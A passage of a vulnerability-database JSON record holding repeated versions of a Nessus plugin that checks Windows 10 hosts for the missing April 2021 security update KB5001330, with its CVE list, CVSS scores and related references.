script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.5"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-09-18T23:46:32", "differentElements": ["vpr"], "edition": 15}, {"bulletin": {"id": "SMB_NT_MS21_APR_5001330.NASL", "hash": "09fdf79fa3ec99bdcf5678305005bda9", "type": "nessus", "bulletinFamily": "scanner", "title": "KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)", "description": "The remote Windows host is missing a security update. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-05-05T00:00:00", "modified": "2021-09-17T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/149259", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28315", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28351", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28340", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28311", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28343", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28323", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28336", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28321", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26415", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27088", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28331", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28350", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28354", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27079", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28309", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28339", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28441", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27072", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26416", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28437", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28326", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28438", "https://support.microsoft.com/en-us/help/5001330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28318", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28342", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28327", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28436", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28447", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28443", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28337", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28338", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28334", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28341", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28345", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28314", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28310", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26417", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28325", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28356", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28349", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27095", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28434", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28352", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28316", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28444", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28324", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28317", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28445", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28332", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28358", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28313", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27093", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28442", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28330", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28353", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28355", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28335", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28357", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28320", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28446", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27086", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27089", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27096", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28312", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28348", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28328", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28319", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28344", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28347", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28439", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28435", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27094", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28333", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28440", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26413"], "cvelist": ["CVE-2021-26413", "CVE-2021-26415", "CVE-2021-26416", "CVE-2021-26417", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27086", "CVE-2021-27088", "CVE-2021-27089", "CVE-2021-27090", "CVE-2021-27092", "CVE-2021-27093", "CVE-2021-27094", "CVE-2021-27095", "CVE-2021-27096", "CVE-2021-28309", "CVE-2021-28310", "CVE-2021-28311", "CVE-2021-28312", "CVE-2021-28313", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28316", "CVE-2021-28317", "CVE-2021-28318", "CVE-2021-28319", "CVE-2021-28320", "CVE-2021-28321", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28324", "CVE-2021-28325", "CVE-2021-28326", "CVE-2021-28327", "CVE-2021-28328", "CVE-2021-28329", "CVE-2021-28330", "CVE-2021-28331", "CVE-2021-28332", "CVE-2021-28333", "CVE-2021-28334", "CVE-2021-28335", "CVE-2021-28336", "CVE-2021-28337", "CVE-2021-28338", "CVE-2021-28339", "CVE-2021-28340", "CVE-2021-28341", "CVE-2021-28342", "CVE-2021-28343", "CVE-2021-28344", "CVE-2021-28345", "CVE-2021-28346", "CVE-2021-28347", "CVE-2021-28348", "CVE-2021-28349", "CVE-2021-28350", "CVE-2021-28351", "CVE-2021-28352", "CVE-2021-28353", "CVE-2021-28354", "CVE-2021-28355", "CVE-2021-28356", "CVE-2021-28357", "CVE-2021-28358", "CVE-2021-28434", "CVE-2021-28435", "CVE-2021-28436", "CVE-2021-28437", "CVE-2021-28438", "CVE-2021-28439", "CVE-2021-28440", "CVE-2021-28441", "CVE-2021-28442", "CVE-2021-28443", "CVE-2021-28444", "CVE-2021-28445", "CVE-2021-28446", "CVE-2021-28447"], "immutableFields": [], "lastseen": "2021-09-20T11:56:45", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_VISUAL_STUDIO.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001335.NASL"]}, {"type": "kaspersky", "idList": ["KLA12139", "KLA12142"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-26416", "CVE-2021-28312", "CVE-2021-28336", "CVE-2021-27088", "CVE-2021-26415", "CVE-2021-28316", "CVE-2021-28330", "CVE-2021-27096", "CVE-2021-28352", "CVE-2021-28434", "CVE-2021-28339", "CVE-2021-28313", "CVE-2021-28447", "CVE-2021-28311", "CVE-2021-27072", "CVE-2021-28346", "CVE-2021-28343", "CVE-2021-28321", "CVE-2021-28317", "CVE-2021-27095", "CVE-2021-28318", "CVE-2021-28325", "CVE-2021-28348", "CVE-2021-28443", "CVE-2021-28334", "CVE-2021-28358", "CVE-2021-28446", "CVE-2021-28345", "CVE-2021-28439", "CVE-2021-28326", "CVE-2021-28356", "CVE-2021-28335", "CVE-2021-28323", "CVE-2021-28355", "CVE-2021-26413", "CVE-2021-27089", "CVE-2021-28441", "CVE-2021-28329", "CVE-2021-28350", "CVE-2021-28344", "CVE-2021-28328", "CVE-2021-27092", "CVE-2021-28354", "CVE-2021-28437", "CVE-2021-28444", "CVE-2021-27094", "CVE-2021-28327", "CVE-2021-28445", "CVE-2021-28309", "CVE-2021-26417", "CVE-2021-28349", "CVE-2021-27093", "CVE-2021-28322", "CVE-2021-28320", "CVE-2021-28324", "CVE-2021-28436", "CVE-2021-28337", "CVE-2021-28333", "CVE-2021-28319", "CVE-2021-28351", "CVE-2021-27086", "CVE-2021-28357", "CVE-2021-28332", "CVE-2021-28341", "CVE-2021-28310", "CVE-2021-27079", "CVE-2021-28340", "CVE-2021-28435", "CVE-2021-28314", "CVE-2021-28315", "CVE-2021-28440", "CVE-2021-27090", "CVE-2021-28353", "CVE-2021-28442", "CVE-2021-28342", "CVE-2021-28347", "CVE-2021-28338", "CVE-2021-28331", "CVE-2021-28438"]}, {"type": "mskb", "idList": ["KB5001330", "KB5001292"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-26413/", "MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-28318/"]}], "modified": "2021-09-20T11:56:45", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-20T11:56:45", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/17\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": []}, "lastseen": "2021-09-20T11:56:45", "differentElements": ["vpr"], "edition": 16}], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_VISUAL_STUDIO.NASL"]}, {"type": "kaspersky", "idList": ["KLA12139", "KLA12142"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65"]}, {"type": "cve", "idList": ["CVE-2021-28441", "CVE-2021-28345", "CVE-2021-28353", "CVE-2021-28447", "CVE-2021-28332", "CVE-2021-28348", "CVE-2021-28322", "CVE-2021-28323", "CVE-2021-28319", "CVE-2021-27095", "CVE-2021-28311", "CVE-2021-27089", "CVE-2021-28317", "CVE-2021-28350", "CVE-2021-26416", "CVE-2021-28320", "CVE-2021-28352", "CVE-2021-28351", "CVE-2021-27092", "CVE-2021-28318", "CVE-2021-28328", "CVE-2021-28439", "CVE-2021-28443", "CVE-2021-27086", "CVE-2021-28341", "CVE-2021-28357", "CVE-2021-28355", "CVE-2021-28338", "CVE-2021-28445", "CVE-2021-28437", "CVE-2021-28324", "CVE-2021-28342", "CVE-2021-28315", "CVE-2021-28312", "CVE-2021-28344", "CVE-2021-28434", "CVE-2021-28309", "CVE-2021-28343", "CVE-2021-28313", "CVE-2021-28329", "CVE-2021-28336", "CVE-2021-28440", "CVE-2021-27093", "CVE-2021-28334", "CVE-2021-28337", "CVE-2021-28333", "CVE-2021-28339", "CVE-2021-28321", "CVE-2021-28438", "CVE-2021-27072", "CVE-2021-27079", "CVE-2021-27096", "CVE-2021-28444", "CVE-2021-28331", "CVE-2021-28354", "CVE-2021-28310", "CVE-2021-28435", "CVE-2021-28316", "CVE-2021-27090", "CVE-2021-28356", "CVE-2021-28346", "CVE-2021-28442", "CVE-2021-27088", "CVE-2021-26413", "CVE-2021-28347", "CVE-2021-28335", "CVE-2021-28340", "CVE-2021-28326", "CVE-2021-28358", "CVE-2021-28314", "CVE-2021-27094", "CVE-2021-28330", "CVE-2021-28446", "CVE-2021-26415", "CVE-2021-28436", "CVE-2021-28325", "CVE-2021-28349", "CVE-2021-26417", "CVE-2021-28327"]}, {"type": "mskb", "idList": ["KB5001292", "KB5001330"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-28440/", "MSF:ILITIES/MSFT-CVE-2021-28325/", "MSF:ILITIES/MSFT-CVE-2021-28318/", "MSF:ILITIES/MSFT-CVE-2021-27079/", "MSF:ILITIES/MSFT-CVE-2021-26413/"]}], "modified": "2021-10-11T11:46:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-10-11T11:46:34", "rev": 2}}, "objectVersion": "1.6", "pluginID": "149259", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149259);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/17\");\n\n script_cve_id(\n \"CVE-2021-26413\",\n \"CVE-2021-26415\",\n \"CVE-2021-26416\",\n \"CVE-2021-26417\",\n \"CVE-2021-27072\",\n \"CVE-2021-27079\",\n \"CVE-2021-27086\",\n \"CVE-2021-27088\",\n \"CVE-2021-27089\",\n \"CVE-2021-27090\",\n \"CVE-2021-27092\",\n \"CVE-2021-27093\",\n \"CVE-2021-27094\",\n \"CVE-2021-27095\",\n \"CVE-2021-27096\",\n \"CVE-2021-28309\",\n \"CVE-2021-28310\",\n \"CVE-2021-28311\",\n \"CVE-2021-28312\",\n \"CVE-2021-28313\",\n \"CVE-2021-28314\",\n \"CVE-2021-28315\",\n \"CVE-2021-28316\",\n \"CVE-2021-28317\",\n \"CVE-2021-28318\",\n \"CVE-2021-28319\",\n \"CVE-2021-28320\",\n \"CVE-2021-28321\",\n \"CVE-2021-28322\",\n \"CVE-2021-28323\",\n \"CVE-2021-28324\",\n \"CVE-2021-28325\",\n \"CVE-2021-28326\",\n \"CVE-2021-28327\",\n \"CVE-2021-28328\",\n \"CVE-2021-28329\",\n \"CVE-2021-28330\",\n \"CVE-2021-28331\",\n \"CVE-2021-28332\",\n \"CVE-2021-28333\",\n \"CVE-2021-28334\",\n \"CVE-2021-28335\",\n \"CVE-2021-28336\",\n \"CVE-2021-28337\",\n \"CVE-2021-28338\",\n \"CVE-2021-28339\",\n \"CVE-2021-28340\",\n \"CVE-2021-28341\",\n \"CVE-2021-28342\",\n \"CVE-2021-28343\",\n \"CVE-2021-28344\",\n \"CVE-2021-28345\",\n \"CVE-2021-28346\",\n \"CVE-2021-28347\",\n \"CVE-2021-28348\",\n \"CVE-2021-28349\",\n \"CVE-2021-28350\",\n \"CVE-2021-28351\",\n \"CVE-2021-28352\",\n \"CVE-2021-28353\",\n \"CVE-2021-28354\",\n \"CVE-2021-28355\",\n \"CVE-2021-28356\",\n \"CVE-2021-28357\",\n \"CVE-2021-28358\",\n \"CVE-2021-28434\",\n \"CVE-2021-28435\",\n \"CVE-2021-28436\",\n \"CVE-2021-28437\",\n \"CVE-2021-28438\",\n \"CVE-2021-28439\",\n \"CVE-2021-28440\",\n \"CVE-2021-28441\",\n \"CVE-2021-28442\",\n \"CVE-2021-28443\",\n \"CVE-2021-28444\",\n \"CVE-2021-28445\",\n \"CVE-2021-28446\",\n \"CVE-2021-28447\"\n );\n script_xref(name:\"MSKB\", value:\"5001330\");\n script_xref(name:\"IAVA\", value:\"2021-A-0168-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429\");\n script_xref(name:\"MSFT\", value:\"MS21-5001330\");\n\n script_name(english:\"KB5001330: Windows 10 Version 2004 / Windows 10 Version 20H2 Security Update (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. Note that\nNessus has not tested for this issue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5001330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5001330 to address this issue.\");\n 